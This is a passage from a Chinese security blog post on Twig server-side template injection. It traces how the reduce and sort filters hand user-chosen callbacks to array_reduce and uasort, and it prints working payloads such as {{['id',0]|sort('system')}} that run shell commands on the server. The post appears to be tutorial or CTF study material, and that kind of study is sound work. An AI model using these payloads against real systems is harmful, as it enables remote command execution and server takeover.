invoke__">array_reduce</span>(<span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span>, <span class="hljs-variable">$initial</span>);    <br>&#125;<br></code></pre></td></tr></table></figure>

<p>$array, $arrow, $initial直接被array_reduce函数调用，而array_reduce函数可以发送数组中的值到用户自定义函数，并返回一个字符串，如果我们自定义一个危险函数，就会造成代码执行</p>
<p>exp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;&#123;[<span class="hljs-number">0</span>, <span class="hljs-number">0</span>]|<span class="hljs-title function_ invoke__">reduce</span>(<span class="hljs-string">&quot;system&quot;</span>, <span class="hljs-string">&quot;id&quot;</span>)&#125;&#125;<br>&#123;&#123;[<span class="hljs-number">0</span>, <span class="hljs-number">0</span>]|<span class="hljs-title function_ invoke__">reduce</span>(<span class="hljs-string">&quot;passthru&quot;</span>, <span class="hljs-string">&quot;id&quot;</span>)&#125;&#125;<br>&#123;&#123;[<span class="hljs-number">0</span>, <span class="hljs-number">0</span>]|<span class="hljs-title function_ invoke__">reduce</span>(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-string">&quot;id&quot;</span>)&#125;&#125;    <span class="hljs-comment">// 无回显</span><br></code></pre></td></tr></table></figure>

<h3 id="0x04"><a href="#0x04" class="headerlink" title="0x04"></a>0x04</h3><p>sort过滤器</p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">set</span> fruits = [<br>    &#123; name: <span class="hljs-string">&#x27;Apples&#x27;</span>, quantity: <span class="hljs-number">5</span> &#125;,<br>    &#123; name: <span class="hljs-string">&#x27;Oranges&#x27;</span>, quantity: <span class="hljs-number">2</span> &#125;,<br>    &#123; name: <span class="hljs-string">&#x27;Grapes&#x27;</span>, quantity: <span class="hljs-number">4</span> &#125;,<br>] <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">for</span> fruit <span class="hljs-keyword">in</span> fruits<span class="hljs-punctuation">|</span><span class="hljs-keyword">sort</span>((a, b) =&gt; a.quantity &lt;=&gt; b.quantity)<span class="hljs-punctuation">|</span><span class="hljs-keyword">column</span>(<span class="hljs-string">&#x27;name&#x27;</span>) <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml">    </span><span class="hljs-template-variable">&#123;&#123; fruit &#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">endfor</span> <span class="hljs-template-tag">%&#125;</span><br></code></pre></td></tr></table></figure>

<p>twig编译后</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$context</span>[<span class="hljs-string">&#x27;_parent&#x27;</span>] = <span class="hljs-variable">$context</span>;<br><span class="hljs-variable">$context</span>[<span class="hljs-string">&#x27;_seq&#x27;</span>] = <span class="hljs-title function_ invoke__">twig_ensure_traversable</span>(<span class="hljs-title function_ invoke__">twig_sort_filter</span>(<span class="hljs-variable">$this</span>-&gt;env, <span class="hljs-variable">$context</span>[<span class="hljs-string">&quot;fruits&quot;</span>], function (<span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span>) &#123; <span class="hljs-keyword">return</span> (<span class="hljs-variable">$a</span>[<span class="hljs-string">&quot;quantity&quot;</span>] &lt;=&gt; <span class="hljs-variable">$b</span>[<span class="hljs-string">&quot;quantity&quot;</span>]); &#125;));<br><span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$context</span>[<span class="hljs-string">&#x27;_seq&#x27;</span>] <span class="hljs-keyword">as</span> <span class="hljs-variable">$context</span>[<span class="hljs-string">&quot;_key&quot;</span>] =&gt; <span class="hljs-variable">$context</span>[<span class="hljs-string">&quot;fruit&quot;</span>]) &#123;<br>    <span class="hljs-comment">// column()过滤器将返回值为$name的fruit[&#x27;name&#x27;]并输出</span><br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">twig_escape_filter</span>(<span class="hljs-variable">$this</span>-&gt;env, <span class="hljs-title function_ invoke__">twig_get_attribute</span>(<span class="hljs-variable">$this</span>-&gt;env, <span class="hljs-variable">$this</span>-&gt;<span class="hljs-title function_ invoke__">getSourceContext</span>(), <span class="hljs-variable">$context</span>[<span class="hljs-string">&quot;fruit&quot;</span>], <span class="hljs-string">&quot;name&quot;</span>, [], <span class="hljs-string">&quot;array&quot;</span>, <span class="hljs-literal">false</span>, <span class="hljs-literal">false</span>, <span class="hljs-literal">true</span>, <span class="hljs-number">13</span>), <span class="hljs-string">&quot;html&quot;</span>, <span class="hljs-literal">null</span>, <span class="hljs-literal">true</span>);<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p>twig_get_attribute源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">twig_sort_filter</span>(<span class="hljs-params"><span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span> = <span class="hljs-literal">null</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$array</span> <span class="hljs-keyword">instanceof</span> \<span class="hljs-built_in">Traversable</span>) &#123;<br>        <span class="hljs-variable">$array</span> = <span class="hljs-title function_ invoke__">iterator_to_array</span>(<span class="hljs-variable">$array</span>);<br>    &#125; <span class="hljs-keyword">elseif</span> (!\<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$array</span>)) &#123;<br>        <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">RuntimeError</span>(<span class="hljs-title function_ invoke__">sprintf</span>(<span class="hljs-string">&#x27;The sort filter only works with arrays or &quot;Traversable&quot;, got &quot;%s&quot;.&#x27;</span>, \<span class="hljs-title function_ invoke__">gettype</span>(<span class="hljs-variable">$array</span>)));<br>    &#125;<br><br>    <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> !== <span class="hljs-variable">$arrow</span>) &#123;<br>        <span class="hljs-title function_ invoke__">uasort</span>(<span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span>);  <br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-title function_ invoke__">asort</span>(<span class="hljs-variable">$array</span>);<br>    &#125;<br><br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$array</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>代码的危险在</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> !== <span class="hljs-variable">$arrow</span>) &#123;<br>        <span class="hljs-title function_ invoke__">uasort</span>(<span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span>);  <br></code></pre></td></tr></table></figure>

<p>uasort函数使用用户自定义的比较函数对元素按键值进行排序$array, $arrow这两个变量了同时可以使用用户自定义的比较函数对数组中的元素按键值进行排序，我们就可以传入包含函数参数的列表，进行命令执行了。</p>
<p>exp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;&#123;[<span class="hljs-string">&quot;id&quot;</span>, <span class="hljs-number">0</span>]|<span class="hljs-title function_ invoke__">sort</span>(<span class="hljs-string">&quot;system&quot;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<h2 id="end……"><a href="#end……" class="headerlink" title="end……"></a>end……</h2><p>不知道什么原因自己在本地搭的无法读取恶意命令。。。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/">#模版注入</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Twig注入</div>
      <div>http://easoonn.github.io/2023/10/28/Twig注入/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Ysper</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年10月28日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2023年10月28日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/07/27/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8/" title="php反序列化字符串逃逸">
                        <span class="hidden-mobile">php反序列化字符串逃逸</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'Easoonn/Easoonn.github.io');
      s.setAttribute('issue-term', 'pathname');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <div style="font-size: 0.85rem"> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicRibbon.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/Ribbon.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicLine.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/snowflake.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/Cherry.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/star.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/containsWord.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/love.min.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":200,"height":400},"mobile":{"show":false},"rect":"opacity:0.7","log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
